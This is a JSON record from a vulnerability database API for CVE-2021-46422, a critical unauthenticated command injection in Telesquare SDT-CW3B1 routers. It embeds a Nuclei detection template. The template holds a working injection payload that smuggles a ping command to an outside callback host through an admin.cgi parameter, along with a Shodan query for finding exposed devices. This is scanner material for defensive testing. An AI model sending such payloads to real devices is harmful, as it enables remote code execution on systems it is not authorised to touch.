{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-46422/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-46422/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-46422/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-46422/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-46422/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-46422"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-46422"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-46422.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-46422\n\ninfo:\n  name: SDT-CW3B1 1.1.0 - OS Command Injection\n  author: badboycxcc,prajiteshsingh\n  severity: critical\n  description: |\n    Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.\n  remediation: |\n    Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.\n  reference:\n    - https://www.exploit-db.com/exploits/50936\n    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-46422\n    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing\n    - http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-46422\n    cwe-id: CWE-78\n    epss-score: 0.94342\n    epss-percentile: 0.99849\n    cpe: cpe:2.3:h:telesquare:sdt-cs3b1:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: telesquare\n    product: sdt-cs3b1\n    shodan-query: html:\"SDT-CW3B1\"\n  tags: cve2021,cve,packetstorm,telesquare,rce,router,injection,edb,vkev,vuln\nvariables:\n  cmd: \"ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<CmdResult>\"\n\n      - type: word\n        name: http\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n# digest: 4a0a004730450221008b0cd8597ed39044543e8aaf7454123e1acc9b92f302c409b5003c031d079fda02203c6b589aecdcbe6fae1fafb6b135f0c79a12da99d6afc1037e6130046a3ec878:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-46422"
}